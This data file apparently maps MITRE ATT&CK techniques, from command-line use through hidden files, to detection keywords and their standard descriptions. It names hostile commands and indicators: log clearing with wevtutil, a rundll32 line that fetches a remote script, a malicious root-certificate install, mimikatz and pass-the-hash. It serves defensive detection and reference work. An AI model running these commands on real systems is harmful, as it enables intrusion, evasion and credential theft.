t1059 Command-Line Interface cmd.exe,netsh,cmd.exe /c Command-line interfaces provide a way of interacting with computer systems and are a common feature across many types of operating system platforms. (Citation: Wikipedia Command-Line Interface) One example command-line interface on Windows systems is [cmd](https://attack.mitre.org/software/S0106), which can be used to perform a number of tasks including execution of other software. Command-line interfaces can be interacted with locally or remotely via a remote desktop application, reverse shell session, etc. Commands that are executed run with the current permission level of the command-line interface process unless the command includes process invocation that changes permissions context for that execution (e.g. [Scheduled Task](https://attack.mitre.org/techniques/T1053)). Adversaries may use command-line interfaces to interact with systems and execute other software during the course of an operation.
t1069 Permission Groups Discovery groups,net localgroup,net group Adversaries may attempt to find local system or domain-level groups and permissions settings. ### Windows Examples of commands that can list groups are net group /domain and net localgroup using the [Net](https://attack.mitre.org/software/S0039) utility. ### Mac On Mac, this same thing can be accomplished with the dscacheutil -q group for the domain, or dscl . -list /Groups for local groups. ### Linux On Linux, local groups can be enumerated with the groups command and domain groups via the ldapsearch command.
t1070 Indicator Removal on Host wevtutil cl,var/log/ Adversaries may delete or alter generated artifacts on a host system, including logs and potentially captured files such as quarantined malware. Locations and format of logs will vary, but typical organic system logs are captured as Windows events or Linux/macOS files such as [Bash History](https://attack.mitre.org/techniques/T1139) and /var/log/* . Actions that interfere with eventing and other notifications that can be used to detect intrusion activity may compromise the integrity of security solutions, causing events to go unreported. They may also make forensic analysis and incident response more difficult due to lack of sufficient data to determine what occurred. ### Clear Windows Event Logs Windows event logs are a record of a computer's alerts and notifications. Microsoft defines an event as "any significant occurrence in the system or in a program that requires users to be notified or an entry added to a log." There are three system-defined sources of Events: System, Application, and Security. Adversaries performing actions related to account management, account logon and directory service access, etc. may choose to clear the events in order to hide their activities. The event logs can be cleared with the following utility commands: * wevtutil cl system * wevtutil cl application * wevtutil cl security Logs may also be cleared through other mechanisms, such as [PowerShell](https://attack.mitre.org/techniques/T1086).
t1074 Data Staged \system Collected data is staged in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Data Compressed](https://attack.mitre.org/techniques/T1002) or [Data Encrypted](https://attack.mitre.org/techniques/T1022). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
t1075 Pass the Hash sekurlsa::pth Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash. In this technique, valid password hashes for the account being used are captured using a Credential Access technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems. Windows 7 and higher with KB2871997 require valid domain user credentials or RID 500 administrator hashes. (Citation: NSA Spotting)
t1077 Windows Admin Shares ipc$,net use,admin$ Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include C$, ADMIN$, and IPC$. Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over server message block (SMB) (Citation: Wikipedia SMB) to interact with systems using remote procedure calls (RPCs), (Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1035), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1075) and certain configuration and patch levels. (Citation: Microsoft Admin Shares) The [Net](https://attack.mitre.org/software/S0039) utility can be used to connect to Windows admin shares on remote systems using net use commands with valid credentials. (Citation: Technet Net Use)
t1078 Valid Accounts wmic Adversaries may steal the credentials of a specific user or service account using Credential Access techniques or capture credentials earlier in their reconnaissance process through social engineering for means of gaining Initial Access. Accounts that an adversary may use can fall into three categories: default, local, and domain accounts. Default accounts are those that are built into an OS such as Guest or Administrator account on Windows systems or default factory/provider set accounts on other types of systems, software, or devices. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. (Citation: Microsoft Local Accounts Feb 2019) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence. Default accounts are also not limited to Guest and Administrator on client machines; they also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or COTS. 
Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed private keys, or stolen private keys, to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021) (Citation: Metasploit SSH Module) The overlap of account access, credentials, and permissions across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft)
t1081 Credentials in Files dpapi,mimikatz Adversaries may search local file systems and remote file shares for files containing passwords. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords. It is possible to extract passwords from backups or saved virtual machines through [Credential Dumping](https://attack.mitre.org/techniques/T1003). (Citation: CG 2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller. (Citation: SRD GPP)
t1082 System Information Discovery ver ,hostname,systeminfo,/proc/cpuinfo,dir An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. ### Windows Example commands and utilities that obtain this information include ver, [Systeminfo](https://attack.mitre.org/software/S0096), and dir within [cmd](https://attack.mitre.org/software/S0106) for identifying information based on present files and directories. ### Mac On Mac, the systemsetup command gives a detailed breakdown of the system, but it requires administrative privileges. Additionally, the system_profiler gives a very detailed breakdown of configurations, firewall rules, mounted volumes, hardware, and many other things without needing elevated permissions.
t1083 File and Directory Discovery find ,dir ,locate Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. ### Windows Example utilities used to obtain this information are dir and tree. (Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the Windows API. ### Mac and Linux In Mac and Linux, this kind of discovery is accomplished with the ls, find, and locate commands.
t1085 Rundll32 control_rundll,rundll32.exe,wmic The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations. Rundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL) Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")" This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)
t1086 PowerShell powershell PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer. PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk. Administrator permissions are required to use PowerShell to connect to remote systems. A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), PowerSploit, (Citation: Powersploit) and PSAttack. (Citation: Github PSAttack) PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015) (Citation: Microsoft PSfromCsharp APR 2014)
t1087 Account Discovery net localgroup,net group,net user,etc/master.passwd,/domain,etc/passwd Adversaries may attempt to get a listing of local system or domain accounts. ### Windows Example commands that can acquire this information are net user, net group, and net localgroup using the [Net](https://attack.mitre.org/software/S0039) utility or through use of [dsquery](https://attack.mitre.org/software/S0105). If adversaries attempt to identify the primary user, currently logged in user, or set of users that commonly uses a system, [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) may apply. ### Mac On Mac, groups can be enumerated through the groups and id commands. On Mac specifically, dscl . list /Groups and dscacheutil -q group can also be used to enumerate groups and users. ### Linux On Linux, local users can be enumerated through the use of the /etc/passwd file which is world readable. On Mac, this same file is only used in single-user mode in addition to the /etc/master.passwd file. Also, groups can be enumerated through the groups and id commands.
t1088 Bypass User Account Control eventvwr Windows User Account Control (UAC) allows a program to elevate its privileges to perform a task under administrator-level permissions by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works) If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs are allowed to elevate privileges or execute some elevated COM objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of rundll32.exe to load a specifically crafted DLL which loads an auto-elevated COM object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user. (Citation: Davidson Windows) Adversaries can use these techniques to elevate privileges to administrator if the target process is unprotected. Many methods have been discovered to bypass UAC. The Github readme page for UACMe contains an extensive list of methods (Citation: Github UACMe) that have been discovered and implemented within UACMe, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as: * eventvwr.exe can auto-elevate and execute a specified binary or script. 
(Citation: enigma0x3 Fileless UAC Bypass) (Citation: Fortinet Fareit) Another bypass is possible through some Lateral Movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on lateral systems and default to high integrity. (Citation: SANS UAC Bypass)
t1089 Disabling Security Tools taskkill Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security scanning or event reporting.
t1096 NTFS File Attributes -stream Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014) Adversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus. (Citation: Journey into IR ZeroAccess NTFS EA) (Citation: MalwareBytes ADS July 2015)
t1099 Timestomp touch Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools. Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools. (Citation: WindowsIR Anti-Forensic Techniques)
t1100 Web Shell A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server. In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (see, for example, China Chopper Web shell client). (Citation: Lee 2013) Web shells may serve as [Redundant Access](https://attack.mitre.org/techniques/T1108) or as a persistence mechanism in case an adversary's primary access methods are detected and removed.
t1101 Security Support Provider install-ssp Windows Security Support Provider (SSP) DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages and HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called. (Citation: Graeber 2014)
t1102 Web Service net use Adversaries may use an existing, legitimate external Web service as a means for relaying commands to a compromised system. These commands may also include pointers to command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection. Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).
t1105 Remote File Copy scp Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Files may be copied from an external adversary-controlled system through the Command and Control channel to bring tools into the victim network or through alternate protocols with another tool such as [FTP](https://attack.mitre.org/software/S0095). Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp. Adversaries may also copy files laterally between internal victim systems to support Lateral Movement with remote Execution using inherent file sharing protocols such as file sharing over SMB to connected network shares or with authenticated connections with [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) or [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1076).
t1106 Execution through API cmd.exe,powershell.exe,createprocess Adversary tools may directly use the Windows application programming interface (API) to execute binaries. Functions such as the Windows API CreateProcess will allow programs and scripts to start other processes with proper path and argument parameters. (Citation: Microsoft CreateProcess) Additional Windows API calls that can be used to execute binaries include: (Citation: Kanthak Verifier) * CreateProcessA() and CreateProcessW(), * CreateProcessAsUserA() and CreateProcessAsUserW(), * CreateProcessInternalA() and CreateProcessInternalW(), * CreateProcessWithLogonW(), CreateProcessWithTokenW(), * LoadLibraryA() and LoadLibraryW(), * LoadLibraryExA() and LoadLibraryExW(), * LoadModule(), * LoadPackagedLibrary(), * WinExec(), * ShellExecuteA() and ShellExecuteW(), * ShellExecuteExA() and ShellExecuteExW()
t1107 File Deletion del Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process. There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well. Examples include native [cmd](https://attack.mitre.org/software/S0106) functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools. (Citation: Trend Micro APT Attack Tools)
t1110 Brute Force net use Adversaries may use brute force techniques to attempt access to accounts when passwords are unknown or when password hashes are obtained. [Credential Dumping](https://attack.mitre.org/techniques/T1003) is used to obtain password hashes; this may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1075) is not an option. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network. (Citation: Wikipedia Password cracking) Adversaries may attempt to brute force logins without knowledge of passwords or hashes during an operation either with zero knowledge or by attempting a list of known or possible passwords. This is a riskier option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. (Citation: Cylance Cleaver) A related technique called password spraying uses one password (e.g. 'Password01'), or a small list of passwords, that matches the complexity policy of the domain and may be a commonly used password. Logins are attempted with that password and many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying) Typically, management services over commonly used ports are used when password spraying. 
Commonly targeted services include the following: * SSH (22/TCP) * Telnet (23/TCP) * FTP (21/TCP) * NetBIOS / SMB / Samba (139/TCP & 445/TCP) * LDAP (389/TCP) * Kerberos (88/TCP) * RDP / Terminal Services (3389/TCP) * HTTP/HTTP Management Services (80/TCP & 443/TCP) * MSSQL (1433/TCP) * Oracle (1521/TCP) * MySQL (3306/TCP) * VNC (5900/TCP) In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows "logon failure" event ID 4625.
t1112 Modify Registry \inprocserver32,enablelua Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in Persistence and Execution. Access to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API (see examples). Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API. (Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to establish Persistence. (Citation: TrendMicro POWELIKS AUG 2014) (Citation: SpectorOps Hiding Reg Jul 2017) The Registry of a remote system may be modified to aid in execution of files as part of Lateral Movement. It requires the remote Registry service to be running on the target system. (Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) for RPC communication.
t1113 Screen Capture screencapture Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. ### Mac On OSX, the native command screencapture is used to capture screenshots. ### Linux On Linux, there is the native command xwd. (Citation: Antiquated Mac Malware)
t1122 Component Object Model Hijacking inprocserver32 The Component Object Model (COM) is a system within Windows to enable interaction between software components through the operating system. (Citation: Microsoft Component Object Model) Adversaries can use this system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Windows Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead. (Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection.
t1126 Network Share Connection Removal net use Windows shared drive and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) connections can be removed when no longer needed. [Net](https://attack.mitre.org/software/S0039) is an example utility that can be used to remove network share connections with the net use \\system\share /delete command. (Citation: Technet Net Use) Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.
t1129 Execution through Module Load %programfiles%,%systemroot% The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like CreateProcess(), LoadLibrary(), etc. of the Win32 API. (Citation: Wikipedia Windows Library Files) The module loader can load DLLs: * via specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory; * via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension); * via an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs; * via <file name="filename.extension" loadFrom="fully-qualified or relative pathname"> in an embedded or external "application manifest". The file name refers to an entry in the IMPORT directory or a forwarded EXPORT. Adversaries can use this functionality as a way to execute arbitrary code on a system.
t1130 Install Root Certificate certutil Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. (Citation: Wikipedia Root Certificate) Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website. Installation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials. (Citation: Operation Emmental) Atypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide a man-in-the-middle capability for intercepting information transmitted over secure TLS/SSL communications. (Citation: Kaspersky Superfish) Root certificates (and their associated chains) can also be cloned and reinstalled. Cloned certificate chains will carry many of the same metadata characteristics of the source and can be used to sign malicious code that may then bypass signature validation tools (ex: Sysinternals, antivirus, etc.) used to block execution and/or uncover artifacts of Persistence. 
(Citation: SpectorOps Code Signing Dec 2017) In macOS, the Ay MaMi malware uses /usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert to install a malicious certificate as a trusted root certificate into the system keychain. (Citation: objective-see ay mami 2018)
t1134 Access Token Manipulation createprocessasuser,duplicatetokenex,runas,duplicatetoken,logonuser Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token. For example, Microsoft promotes the use of access tokens as a security best practice. Administrators should log in as a standard user but run their tools with administrator privileges using the built-in access token manipulation command runas. (Citation: Microsoft runas) Adversaries may use access tokens to operate under a different user or system security context to perform actions and evade detection. An adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system. (Citation: Pentestlab Token Manipulation) Access tokens can be leveraged by adversaries through three methods: (Citation: BlackHat Atkinson Winchester Token Manipulation) **Token Impersonation/Theft** - An adversary creates a new access token that duplicates an existing token using DuplicateToken(Ex). The token can then be used with ImpersonateLoggedOnUser to allow the calling thread to impersonate a logged on user's security context, or with SetThreadToken to assign the impersonated token to a thread. This is useful for when the target user has a non-network logon session on the system. 
**Create Process with a Token** - An adversary creates a new access token with DuplicateToken(Ex) and uses it with CreateProcessWithTokenW to create a new process running under the security context of the impersonated user. This is useful for creating a new process under the security context of a different user. **Make and Impersonate Token** - An adversary has a username and password but the user is not logged onto the system. The adversary can then create a logon session for the user using the LogonUser function. The function will return a copy of the new session's access token and the adversary can use SetThreadToken to assign the token to a thread. Any standard user can use the runas command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account. Metasploit’s Meterpreter payload allows arbitrary token manipulation and uses token impersonation to escalate privileges. (Citation: Metasploit access token) The Cobalt Strike beacon payload allows arbitrary token impersonation and can also create tokens. (Citation: Cobalt Strike Access Token)
t1135 Network Share Discovery net share Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. ### Windows File sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder) [Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using the net view \\remotesystem command. It can also be used to query shared drives on the local system using net share. Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. ### Mac On Mac, locally mounted shares can be viewed with the df -aH command.
t1136 Create Account net user Adversaries with a sufficient level of access may create a local system or domain account. Such accounts may be used for persistence that does not require persistent remote access tools to be deployed on the system. The net user commands can be used to create a local or domain account.
t1139 Bash History /dev/null Bash keeps track of the commands users type on the command-line with the "history" utility. Once a user logs out, the history is flushed to the user’s .bash_history file. For each user, this file resides at the same location: ~/.bash_history. Typically, this file keeps track of the user’s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Attackers can abuse this by looking through the file for potential credentials. (Citation: External to DA, the OS X Way)
t1140 Deobfuscate/Decode Files or Information certutil -decode,certutil Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware, [Scripting](https://attack.mitre.org/techniques/T1064), [PowerShell](https://attack.mitre.org/techniques/T1086), or by using utilities present on the system. One such example is use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file. (Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows copy /b command to reassemble binary fragments into a malicious payload. (Citation: Carbon Black Obfuscation Sept 2016) Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used with [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also use compressed or archived scripts, such as JavaScript.
t1142 Keychain security Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes, certificates, and Kerberos. Keychain files are located in ~/Library/Keychains/, /Library/Keychains/, and /Network/Library/Keychains/. (Citation: Wikipedia keychain) The security command-line utility, which is built into macOS by default, provides a useful way to manage these credentials. To manage their credentials, users have to use additional credentials to access their keychain. If an adversary knows the credentials for the login keychain, then they can get access to all the other credentials stored in this vault. (Citation: External to DA, the OS X Way) By default, the passphrase for the keychain is the user’s logon credentials.
t1145 Private Keys .ssh Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures. (Citation: Wikipedia Public Key Crypto) Adversaries may gather private keys from compromised systems for use in authenticating to [Remote Services](https://attack.mitre.org/techniques/T1021) like SSH or for use in decrypting other collected files such as email. Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk, .p12, .pem, .pfx, .cer, .p7b, .asc. Adversaries may also look in common key directories, such as ~/.ssh for SSH keys on *nix-based systems or C:\Users\(username)\.ssh\ on Windows. Private keys should require a password or passphrase for operation, so an adversary may also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase off-line. Adversary tools have been discovered that search compromised systems for file extensions relating to cryptographic keys and certificates. (Citation: Kaspersky Careto) (Citation: Palo Alto Prince of Persia)
t1148 HISTCONTROL history The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. This setting can be configured to ignore commands that start with a space by simply setting it to "ignorespace". HISTCONTROL can also be set to ignore duplicate commands by setting it to "ignoredups". In some Linux systems, this is set by default to "ignoreboth" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected. Adversaries can use this to operate without leaving traces by simply prepending a space to all of their terminal commands.
t1153 Source source The source command loads functions into the current shell or executes files in the current context. This built-in command can be run in two different ways: source /path/to/filename [arguments] or . /path/to/filename [arguments]. Take note of the space after the ".". Without a space, a new shell is created that runs the program instead of running the program within the current context. This is often used to make certain features or functions available to a shell or to update a specific shell's environment. Adversaries can abuse this functionality to execute programs. The file executed with this technique does not need to be marked executable beforehand.
t1154 Trap trap,ctrl+c The trap command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c and ctrl+d. Adversaries can use this to register code to be executed when the shell encounters specific interrupts either to gain execution or as a persistence mechanism. Trap commands are of the following format trap 'command list' signals where "command list" will be executed when "signals" are received.
t1155 AppleScript osascript macOS and OS X applications send AppleEvent messages to each other for interprocess communications (IPC). These messages can be easily scripted with AppleScript for local or remote IPC. Osascript executes AppleScript and any other Open Scripting Architecture (OSA) language scripts. A list of OSA languages installed on a system can be found by using the osalang program. AppleEvent messages can be sent independently or as part of a script. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely. Adversaries can use this to interact with open SSH connections, move to remote machines, and even present users with fake dialog boxes. These events cannot start applications remotely (they can start them locally though), but can interact with applications if they're already running remotely. Since this is a scripting language, it can be used to launch more common techniques as well, such as a reverse shell via python (Citation: Macro Malware Targets Macs). Scripts can be run from the command-line via osascript /path/to/script or osascript -e "script here".
t1158 Hidden Files and Directories attrib +h To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a for Windows and ls -a for Linux and macOS). Adversaries can use this to their advantage to hide files and folders anywhere on the system for persistence and evading a typical user or system analysis that does not incorporate investigation of hidden files. ### Windows Users can mark specific files as hidden by using the attrib.exe binary. Simply do attrib +h filename to mark a file or folder as hidden. Similarly, the “+s” marks a file as a system file and the “+r” flag marks the file as read only. Like most Windows binaries, the attrib.exe binary provides the ability to apply these changes recursively “/S”. ### Linux/Mac Users can mark specific files as hidden simply by putting a “.” as the first character in the file or folder name (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folders that start with a period, ‘.’, are by default hidden from being viewed in the Finder application and standard command-line utilities like “ls”. Users must specifically change settings to have these files viewable. For command line usages, there is typically a flag to see all files (including hidden ones). To view these files in the Finder Application, the following command must be executed: defaults write com.apple.finder AppleShowAllFiles YES, and then relaunch the Finder Application. ### Mac Files on macOS can be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker). 
Many applications create these hidden files and folders to store information so that it doesn’t clutter up the user’s workspace. For example, SSH utilities create a .ssh folder that’s hidden and contains the user’s known hosts and keys.
